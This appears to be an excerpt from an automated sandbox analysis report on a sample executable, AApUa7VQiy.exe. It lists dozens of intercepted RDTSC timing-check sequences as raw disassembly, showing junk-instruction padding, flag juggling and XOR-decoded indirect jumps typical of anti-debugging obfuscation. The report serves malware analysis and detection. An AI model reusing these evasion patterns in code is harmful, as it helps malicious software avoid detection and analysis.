                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1189731 second address: 1189770 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF30D194DC3h 0x00000008 jmp 00007FF30D194DBDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FF30D194DBEh 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a pop edx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 jmp 00007FF30D194DBAh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1189770 second address: 1189774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1189774 second address: 1189795 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007FF30D194DBBh 0x00000013 jnp 00007FF30D194DBCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118A95E second address: 118A964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118E1F8 second address: 118E1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A8726 second address: 10A872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A872A second address: 10A872F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A872F second address: 10A8735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A076F second address: 53A0836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF30D194DC7h 0x00000009 xor ax, C87Eh 0x0000000e jmp 00007FF30D194DC9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF30D194DC0h 0x0000001a xor al, 00000078h 0x0000001d jmp 00007FF30D194DBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FF30D194DC6h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov eax, 7C096B6Dh 0x00000034 pushfd 0x00000035 jmp 00007FF30D194DBAh 0x0000003a and eax, 42270508h 0x00000040 jmp 00007FF30D194DBBh 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ecx 0x00000048 pushad 0x00000049 movzx eax, bx 0x0000004c mov ecx, ebx 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007FF30D194DBAh 0x00000055 xchg eax, ecx 0x00000056 pushad 0x00000057 jmp 00007FF30D194DBEh 0x0000005c mov ah, F2h 0x0000005e popad 0x0000005f push ebp 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0836 second address: 53A083A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A083A second address: 53A083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A083E second address: 53A0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0844 second address: 53A08CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 call 00007FF30D194DC9h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], esi 0x00000012 pushad 0x00000013 mov si, 9D1Fh 0x00000017 popad 0x00000018 lea eax, dword ptr [ebp-04h] 0x0000001b jmp 00007FF30D194DC2h 0x00000020 nop 0x00000021 pushad 0x00000022 call 00007FF30D194DBEh 0x00000027 call 00007FF30D194DC2h 0x0000002c pop esi 0x0000002d pop edi 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FF30D194DBAh 0x00000038 nop 0x00000039 pushad 0x0000003a mov cl, D0h 0x0000003c popad 0x0000003d push dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov di, 2BF4h 0x00000047 mov ebx, 0A071360h 0x0000004c popad 0x0000004d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0906 second address: 53A0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007FF30CF3CAEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [ebp-04h], 00000000h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0926 second address: 53A092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A092C second address: 53A0930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0930 second address: 53A0948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF30D194DBCh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0948 second address: 53A095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEEh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A09A5 second address: 5390023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c jmp 00007FF30D194DBCh 0x00000011 mov bx, si 0x00000014 popad 0x00000015 pop esi 0x00000016 jmp 00007FF30D194DBCh 0x0000001b leave 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FF30D194DBEh 0x00000023 xor eax, 316A7648h 0x00000029 jmp 00007FF30D194DBBh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FF30D194DC8h 0x00000035 adc ecx, 74FEB8A8h 0x0000003b jmp 00007FF30D194DBBh 0x00000040 popfd 0x00000041 popad 0x00000042 retn 0004h 0x00000045 nop 0x00000046 sub esp, 04h 0x00000049 xor ebx, ebx 0x0000004b cmp eax, 00000000h 0x0000004e je 00007FF30D194F0Bh 0x00000054 mov dword ptr [esp], 0000000Dh 0x0000005b call 00007FF31164A0F5h 0x00000060 mov edi, edi 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 pushfd 0x00000066 jmp 00007FF30D194DBAh 0x0000006b add cl, FFFFFFF8h 0x0000006e jmp 00007FF30D194DBBh 0x00000073 popfd 0x00000074 movzx ecx, di 0x00000077 popad 0x00000078 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390023 second address: 5390043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ecx 0x0000000f mov cx, di 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390043 second address: 5390058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC1h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390058 second address: 5390098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FF30CF3CAEDh 0x00000015 xor ax, B956h 0x0000001a jmp 00007FF30CF3CAF1h 0x0000001f popfd 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390098 second address: 539009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539009C second address: 53900AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, 08h 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, C2h 0x0000000f push edx 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53900AE second address: 53900B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53900B3 second address: 53900DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF30CF3CAF1h 0x0000000e sub esp, 2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF30CF3CAEDh 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53901BD second address: 53901C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53901C3 second address: 5390203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FF30CF3CAF1h 0x00000010 sub edi, edi 0x00000012 pushad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 mov cx, bx 0x0000001c popad 0x0000001d inc ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ch, 6Eh 0x00000023 mov si, bx 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390203 second address: 5390209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390209 second address: 539020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539020D second address: 5390211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53902C6 second address: 53902CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53902CC second address: 53902D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53902D0 second address: 539030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FF30CF3CAF4h 0x0000000f mov bx, cx 0x00000012 pop ecx 0x00000013 mov ch, dl 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF30CF3CAF0h 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539030A second address: 5390319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390319 second address: 539031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539031F second address: 5390323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390323 second address: 5390327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539033B second address: 539033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539033F second address: 5390357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390357 second address: 539035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539035D second address: 53903B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FF30CF3CAF9h 0x0000000f jg 00007FF37DC4ABF2h 0x00000015 jmp 00007FF30CF3CAEEh 0x0000001a js 00007FF30CF3CB64h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF30CF3CAF7h 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903B3 second address: 53903B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903B9 second address: 53903BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903BD second address: 53903C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903C1 second address: 53903F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF30CF3CAEDh 0x00000012 adc ecx, 4C55E246h 0x00000018 jmp 00007FF30CF3CAF1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov edx, esi 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903F7 second address: 5390447 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FF37DEA2E53h 0x0000000d jmp 00007FF30D194DC4h 0x00000012 mov ebx, dword ptr [ebp+08h] 0x00000015 jmp 00007FF30D194DC0h 0x0000001a lea eax, dword ptr [ebp-2Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF30D194DC7h 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390447 second address: 53904AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 39A4129Ah 0x00000008 mov di, BE66h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF30CF3CAEFh 0x00000019 or cx, 28EEh 0x0000001e jmp 00007FF30CF3CAF9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FF30CF3CAF0h 0x0000002a sub eax, 7F99F068h 0x00000030 jmp 00007FF30CF3CAEBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53904AD second address: 53904B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53904B3 second address: 53904B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53904B7 second address: 5390518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FF30D194DC7h 0x00000010 nop 0x00000011 pushad 0x00000012 mov dx, ax 0x00000015 pushfd 0x00000016 jmp 00007FF30D194DC0h 0x0000001b or cx, 4528h 0x00000020 jmp 00007FF30D194DBBh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF30D194DC4h 0x0000002f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390518 second address: 5390556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF30CF3CAF6h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov al, 43h 0x00000013 mov ebx, 3FD2C47Eh 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF30CF3CAEBh 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390619 second address: 5380BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007FF37DEA2DECh 0x0000000c xor eax, eax 0x0000000e jmp 00007FF30D16E4EAh 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0004h 0x0000001a nop 0x0000001b sub esp, 04h 0x0000001e mov esi, eax 0x00000020 cmp esi, 00000000h 0x00000023 setne al 0x00000026 xor ebx, ebx 0x00000028 test al, 01h 0x0000002a jne 00007FF30D194DB7h 0x0000002c jmp 00007FF30D194EE1h 0x00000031 call 00007FF31163AB43h 0x00000036 mov edi, edi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF30D194DC3h 0x0000003f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380BAD second address: 5380BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380BD0 second address: 5380BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380BD4 second address: 5380C05 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF30CF3CAF8h 0x00000008 and eax, 6E352F08h 0x0000000e jmp 00007FF30CF3CAEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D4B second address: 5380D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D51 second address: 5380D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D55 second address: 5380D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D59 second address: 5380D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D68 second address: 5380D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D6E second address: 5380D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D74 second address: 539094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 add esp, 28h 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b mov eax, dword ptr [00EEBBB8h+ebx*4] 0x00000022 mov ecx, 15B4E13Fh 0x00000027 xor ecx, dword ptr [00EEBBC0h] 0x0000002d add eax, ecx 0x0000002f inc eax 0x00000030 jmp eax 0x00000032 push edi 0x00000033 call 00007FF30D1BE704h 0x00000038 push ebp 0x00000039 push ebx 0x0000003a push edi 0x0000003b push esi 0x0000003c sub esp, 0000017Ch 0x00000042 mov dword ptr [esp+00000160h], 00EEDD20h 0x0000004d mov dword ptr [esp+0000015Ch], 000000D0h 0x00000058 mov dword ptr [esp], 00000000h 0x0000005f mov eax, dword ptr [00EE9D4Ch] 0x00000064 call eax 0x00000066 mov edi, edi 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FF30D194DBBh 0x0000006f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539094E second address: 53909A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FF30CF3CAF9h 0x00000015 and ah, FFFFFF86h 0x00000018 jmp 00007FF30CF3CAF1h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909A1 second address: 53909B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov di, 0D0Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909B5 second address: 53909B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909B9 second address: 53909BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909BD second address: 53909C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909C3 second address: 53909E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909E6 second address: 53909EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909EC second address: 5390A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF30D194DBDh 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FF30D194DC1h 0x0000001a sub ecx, 52CF7C06h 0x00000020 jmp 00007FF30D194DC1h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390A42 second address: 5390A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
